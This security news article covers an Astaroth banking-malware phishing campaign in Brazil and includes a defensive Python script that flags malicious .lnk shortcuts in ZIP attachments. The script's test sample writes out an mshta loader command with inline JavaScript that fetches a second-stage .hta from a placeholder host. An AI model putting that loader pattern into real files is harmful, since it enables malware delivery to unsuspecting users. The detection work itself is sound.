New Wave of Astaroth Banking Malware via Spear-Phishing Scams

A new spear-phishing campaign is targeting users in Brazil with the notorious Astaroth (also known as Guildma) banking malware, using obfuscated JavaScript to slip past security controls.

According to the researchers' report, the campaign has hit the manufacturing and retail sectors as well as government agencies. The phishing emails pose as official tax-related documents and lean on the pressure of income tax filing deadlines to lure recipients into downloading the malware.

The campaign, tracked under the name Water Makara by cybersecurity researchers, bears similarities to a previous attack, which Google’s Threat Analysis Group (TAG) named PINEAPPLE.

Both campaigns rely on phishing emails that impersonate reputable organizations like Receita Federal, Brazil’s federal tax authority. Victims are tricked into downloading a ZIP file containing what appears to be tax documents, but is actually a Windows shortcut (LNK) file.

Once opened, the LNK file abuses mshta.exe, a legitimate, signed Windows binary that runs HTML Applications and inline script, to execute obfuscated JavaScript. That script contacts a remote command-and-control (C2) server and fetches the next stage, starting the installation of Astaroth. Because the tool is already on every Windows machine, the chain avoids dropping an obvious executable at this step.
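The ZIP-to-LNK-to-mshta.exe chain described above is what a mail gateway or sandbox can check for before a user ever double-clicks. The following Python is an added example, not code from the report or from the researchers: it parses the StringData fields of a Windows shortcut using the public MS-SHLLINK layout, flags shortcuts whose target is a script host such as mshta.exe, whose arguments carry inline script or a URL, or whose name spoofs a document extension, and runs that check over every .lnk member of a ZIP. The shortcut, its `example.invalid` URL, the file names and the archive are constructed test data, not artifacts from the campaign.

```python
"""Triage a ZIP attachment for .lnk files that launch a script host such as
mshta.exe. Added example; field layout follows MS-SHLLINK (header, optional
IDList/LinkInfo, then StringData). All sample data below is constructed."""
import io
import re
import struct
import zipfile

# ShellLinkHeader constants (MS-SHLLINK section 2.1)
HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                 (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location"))

# Script hosts and LOLBins a "tax document" has no business launching.
SCRIPT_HOSTS = ("mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                "rundll32.exe", "regsvr32.exe")
PAYLOAD_HINTS = re.compile(r"javascript:|vbscript:|https?://|\.hta\b", re.I)
DOC_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg")


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shortcut (name, relative_path, ...)."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = HEADER_SIZE
    if flags & HAS_ID_LIST:      # LinkTargetIDList: uint16 size, then items
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:    # LinkInfo: uint32 size that includes itself
        off += struct.unpack_from("<I", data, off)[0]
    fields = {}
    for flag, key in STRING_FIELDS:  # StringData: uint16 char count + chars
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        if flags & IS_UNICODE:
            fields[key] = data[off:off + 2 * count].decode("utf-16-le", "replace")
            off += 2 * count
        else:
            fields[key] = data[off:off + count].decode("cp1252", "replace")
            off += count
    return fields


def assess_lnk(name: str, fields: dict) -> list:
    """Reasons this shortcut looks like a loader; empty list means nothing seen."""
    reasons = []
    target = fields.get("relative_path", "").lower().replace("/", "\\")
    exe = target.rsplit("\\", 1)[-1]
    if exe in SCRIPT_HOSTS:
        reasons.append(f"target is script host {exe}")
    if PAYLOAD_HINTS.search(fields.get("arguments", "")):
        reasons.append("arguments carry inline script or a URL")
    if name.lower()[:-4].endswith(DOC_EXTENSIONS):  # strip ".lnk", check spoof
        reasons.append("document extension spoofed before .lnk")
    return reasons


def triage_zip(zip_bytes: bytes) -> dict:
    """Map each suspicious .lnk member of the archive to its list of traits."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            try:
                reasons = assess_lnk(info.filename, parse_lnk(zf.read(info)))
            except ValueError as exc:
                reasons = [str(exc)]
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Construct a minimal Unicode shortcut: header plus two StringData fields."""
    flags = HAS_REL_PATH | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, arguments))
    return header + body


def build_zip(members: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, payload in members.items():
            zf.writestr(name, payload)
    return buf.getvalue()


# Constructed sample: a "tax return" shortcut that really runs mshta.exe with
# inline JavaScript fetching a second stage from a placeholder host.
SAMPLE_ARGS = ('javascript:var s=new ActiveXObject("WScript.Shell");'
               's.Run("mshta https://stage2.example.invalid/r.hta",0);close();')
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\mshta.exe", SAMPLE_ARGS)
SAMPLE_ZIP = build_zip({"Declaracao_IRPF_2024.pdf.lnk": SAMPLE_LNK,
                        "leia-me.txt": b"Segue em anexo a declaracao solicitada."})

if __name__ == "__main__":
    for member, reasons in triage_zip(SAMPLE_ZIP).items():
        print(member, "->", "; ".join(reasons))
```

The parser deliberately skips the LinkTargetIDList and LinkInfo blocks by their own size fields rather than interpreting them, which is enough to reach the relative path and arguments that reveal the launcher. On real attachments, treat any shortcut whose target is a script host as hostile regardless of what the arguments look like; obfuscation is aimed at the argument string, not at the choice of binary.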

Although Astaroth has been around for some time, it has evolved, making it a persistent and sophisticated threat. Beyond stealing sensitive financial information, the malware can cause long-term damage to businesses, eroding consumer trust, increasing the risk of regulatory penalties, and leading to significant downtime and costly recovery efforts.

Strong password policies, multi-factor authentication (MFA) and up-to-date security software all limit what an attacker gains from stolen banking credentials, but none of them stops a shortcut from launching mshta.exe. Defenders should also address the delivery chain itself: block or quarantine ZIP attachments that contain LNK files at the mail gateway, and restrict mshta.exe and other script hosts with application control (AppLocker or Windows Defender Application Control) or with the attack surface reduction rule that blocks JavaScript and VBScript from launching downloaded content.

Organizations should also apply the principle of least privilege (PoLP) so that a compromised user account cannot be used to spread the malware across the network.